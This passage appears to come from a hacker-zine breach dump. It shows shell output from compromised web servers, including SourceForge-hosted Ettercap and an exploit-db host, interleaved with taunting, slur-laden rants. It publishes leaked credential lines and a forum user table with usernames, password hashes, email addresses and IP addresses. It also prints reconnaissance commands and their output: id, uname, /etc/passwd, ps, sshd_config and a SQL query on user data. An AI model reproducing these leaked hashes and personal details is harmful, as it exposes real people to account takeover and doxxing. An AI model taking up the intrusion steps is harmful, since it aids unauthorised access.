15:35 report.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php + +$ cat includes/config.php +ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10: +L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151: +Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com:: +eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225: +KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163: +anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15: + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ ettercap ~ ! + +You would think that the authors of Ettercap, one of the most popular +whitehat pentesting tools, would know the basics of security. +Apparently they don't, or they just don't give a shit about what +happens to their users. + +So, why is their website so insecure? Ettercap's message board is +hosted at Sourceforge, so they share a server with thousands of other +customers. Every single customer is able to execute commands and +access the other project directories. Pretty stupid, eh? You only need +to find one hole in one hosted site and you can access ALL the project +databases. Of course that isn't ALoR's fault, it's Sourceforge's +fault. Regardless, people who care about security and data integrity +wouldn't use such a shitty provider, would they? To be fair, the +Ettercap project is dead. Most of the admins have been inactive for a +few years now, but that is no excuse for such a security mess. +Especially since the server was compromised some five years ago. + +Just look at the process list, horrible. Even the worst perl bots +(scax) get access. If such a poorly written bot can own this box, +everyone can. + +Some good advice to all other people/projects who are using +Sourceforge: Move. There are enough good alternatives. Yes, I am +talking to you Vim, get the fuck out of there. And to all Ettercap +users: arp poisoning is *not* hacking. If you want to achieve +something real, learn the fundamentals and not how to use a GUI. Don't +sniff the passwords of your friends and call yourself a pentester +(looking at you firesheep). + + _ _ + | | | | + ___| |_| |_ ___ _ __ ___ _ __ __ _ __ + / _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \ + | __/ |_| || __/ | | (__| | / /\ \ | |_) | + \___|\__|\__\___|_| \___|_| /_/ \_\| .__/ + | | + |_| + Baa. + I flood SID's + I'm a Hacker!! Baa. + Baa. Baa. I sit at starbucks +I sniff packets | I'm a Hacker!! +I'm a Hacker!! | Baa. +Baa.. | / + \ __ _ | / YOUR ALL FUCKING + \ .-.' `; `-._ __ _ __ _ SHEEP. + \ (_, .-:' `; `-._.-.:' `; `-._ + ,'o"( "HACKE(_, (_, ) + (__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP! + ( (__,-' (__,-' ) + `-'._.--._( ( ) FUCKING INNOVATE! + ||| |||`-'._.--._.-' `-'._.--._.-' + ||| ||| ||| ||| + +$ uname -a +Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=48(apache) groups=48(apache),302(amqp) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +exim:x:93:93::/var/spool/exim:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +rpm:x:37:37::/var/lib/rpm:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin +named:x:25:25:Named:/var/named:/sbin/nologin +sashroot:x:0:500:sashroot:/sashroot:/bin/bash +osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin +puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +vhost:*:310:310:Vhost User:/home/vhost:/bin/bash +rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash +nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false +nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin +dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false +www:*:448:448:WWW User:/var/www:/bin/bash +sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash +sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash +avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin +munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin +rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin + +$ ps auxwww +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3] +root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0] +root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0] +root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0] +root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1] +root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1] +root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1] +root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2] +root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2] +root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2] +root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3] +root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3] +root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3] +root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4] +root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4] +root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4] +root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5] +root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5] +root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5] +root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6] +root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6] +root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6] +root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7] +root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7] +root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7] +root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0] +root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1] +root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2] +root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3] +root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4] +root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5] +root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6] +root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7] +root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper] +root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread] +root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0] +root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1] +root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2] +root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3] +root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4] +root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5] +root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6] +root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7] +root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid] +root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0] +root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1] +root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2] +root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3] +root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4] +root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5] +root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6] +root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7] +root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd] +root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod] +root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd] +root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0] +root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0] +root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1] +root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2] +root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3] +root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4] +root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5] +root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6] +root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7] +root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused] +root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0] +root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0] +root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1] +root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2] +root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3] +root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4] +root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5] +root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6] +root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7] +root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux] +root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1] +root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage] +root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2] +root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage] +root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped] +root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd] +root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald] +root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd] +root 813 0.0 0.0 12764 168 ? S + +$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email, +phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank +id WHERE user_rank > 0 ORDER BY user_rank +NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer +ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter +metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter +ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester +drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester +Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester +Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester +Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester +m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester +Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester +MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester +Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester +garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester +Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester +mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester +stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester +DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester +cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester +Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester +SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker +LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum +megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it: +Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor +daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor + + + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ exploit-db ~ + +Now we come to a different topic. A topic about people who leech off +what the scene creates and call it their own. About people who +copyright ideas and papers about security related topics that have +been around for years. How many XSS-Papers are there currently on +exploit-db? How many retarded strcpy(buf, argv[1])-papers are being +written over and over again? About whitehats who think releasing +exploits would make the world much more safe. And because of fame. +They all want fame so badly that they do anything and everything in +order to be part of the security industry. What's even more hilarious +is that these "famous" security people keep getting owned. We mean +el8, phc, h0no, and zf0 have all owned these "Security Rockstar" +faggots and yet, nothing changes. Or the attacks are categorized as +"skiddy" behavior. It's rediculous how terrible the industry is. There +is no accountability anymore. + +Still there are some lame skids that need a good spanking. Stupid 10 +year olds who take perl-exploits to destroy clan-pages for fun and +call themselves "hackers" without knowing what they are doing. +Criminals who take exploits to steal payment stuff for their own +selfish financial gain. And to get their friends thrown in jail +(soup). Fame and money... Get the message? + +$ uname -a +Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux + +$ id +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +$ pwd +/var/www + +$ ls -la +total 24180 +drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 . +drwxr-xr-x 19 root root 4096 Sep 24 09:26 .. +-rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess +-rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save +-rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png +drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734 +-rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php +-rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2 +-rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html +-rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners +-rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico +-rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt +-rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt +drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404 +-rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php +-rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php +-rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html +-rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt +-rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml +drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images +-rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php +drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads +-rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php +drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies +-rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php +drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default +-rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html +-rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt +-rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html +-rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt +-rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml +-rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts +-rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php +-rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php +-rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml +-rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl +-rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml +-rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz +drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider +drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits +-rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme +-rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php +-rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt +-rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php +drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos +-rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php +drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin +-rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php +-rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php +-rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php +-rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php +-rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php +-rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php +drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content +-rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php +-rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php +drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes +-rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php +-rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php +-rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php +-rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php +-rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php +-rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php +-rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php +-rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php +-rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php +-rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php +-rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php + + +$ cat wp-config.php + boot/initrd.img-2.6.32-26-server +lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server +drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib +lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib +drwx------ 2 root root 16384 Jul 9 05:28 lost+found +drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint +drwxr-xr-x 3 root root 4096 Jul 9 05:28 media +drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt +drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt +dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc +drwx------ 9 root root 4096 Nov 25 09:08 root +drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin +drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux +drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv +drwxr-xr-x 13 root root 0 Nov 11 10:45 sys +drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp +drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr +drwxr-xr-x 19 root root 4096 Sep 24 09:26 var +lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server +lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +syslog:x:101:103::/home/syslog:/bin/false +sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin +landscape:x:103:108::/var/lib/landscape:/bin/false +mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false +smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +emgent:x:1003:1002:,,,:/home/emgent:/bin/bash +ossec:x:1004:1003::/var/ossec:/bin/false +ossecm:x:1005:1003::/var/ossec:/bin/false +ossecr:x:1006:1003::/var/ossec:/bin/false + +$ cat /etc/issue +Ubuntu 10.04.1 LTS \n \l + + +$ cat /etc/ssh/sshd_config +# Package generated configuration file +# See the sshd_config(5) manpage for details + +# What ports, IPs and protocols we listen for +Port 22 +# Use these options to restrict which interfaces/protocols sshd will bind to +#ListenAddress :: +#ListenAddress 0.0.0.0 +Protocol 2 +# HostKeys for protocol version 2 +HostKey /etc/ssh/ssh_host_rsa_key +HostKey /etc/ssh/ssh_host_dsa_key +#Privilege Separation is turned on for security +UsePrivilegeSeparation yes + +# Lifetime and size of ephemeral version 1 server key +KeyRegenerationInterval 3600 +ServerKeyBits 768 + +# Logging +SyslogFacility AUTH +LogLevel INFO + +# Authentication: +LoginGraceTime 120 +PermitRootLogin yes +StrictModes yes + +RSAAuthentication yes +PubkeyAuthentication yes +#AuthorizedKeysFile %h/.ssh/authorized_keys + +# Don't read the user's ~/.rhosts and ~/.shosts files +IgnoreRhosts yes +# For this to work you will also need host keys in /etc/ssh_known_hosts +RhostsRSAAuthentication no +# similar for protocol version 2 +HostbasedAuthentication no +# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication +#IgnoreUserKnownHosts yes + +# To enable empty passwords, change to yes (NOT RECOMMENDED) +PermitEmptyPasswords no + +# Change to yes to enable challenge-response passwords (beware issues with +# some PAM modules and threads) +ChallengeResponseAuthentication no + +# Change to no to disable tunnelled clear text passwords +PasswordAuthentication yes + +# Kerberos options +#KerberosAuthentication no +#KerberosGetAFSToken no +#KerberosOrLocalPasswd yes +#KerberosTicketCleanup yes + +# GSSAPI options +#GSSAPIAuthentication no +#GSSAPICleanupCredentials yes + +X11Forwarding yes +X11DisplayOffset 10 +PrintMotd no +PrintLastLog yes +TCPKeepAlive yes +#UseLogin no + +#MaxStartups 10:30:60 +#Banner /etc/issue.net + +# Allow client to pass locale environment variables +AcceptEnv LANG LC_* + +Subsystem sftp /usr/lib/openssh/sftp-server + +# Set this to 'yes' to enable PAM authentication, account processing, +# and session processing. If this is enabled, PAM authentication will +# be allowed through the ChallengeResponseAuthentication and +# PasswordAuthentication. Depending on your PAM configuration, +# PAM authentication via ChallengeResponseAuthentication may bypass +# the setting of "PermitRootLogin without-password". +# If you just want the PAM account and session checks to run without +# PAM authentication, then enable this but set PasswordAuthentication +# and ChallengeResponseAuthentication to 'no'. +UsePAM yes + +$ cd /home + +$ ls -la +total 12 +drwxr-xr-x 3 root root 4096 Aug 3 11:48 . +drwxr-xr-x 26 root root 4096 Nov 30 06:53 .. +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent + +$ cd emgent + +$ ls -la +total 48 +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 . +drwxr-xr-x 3 root root 4096 Aug 3 11:48 .. +-rw------- 1 emgent emgent 259 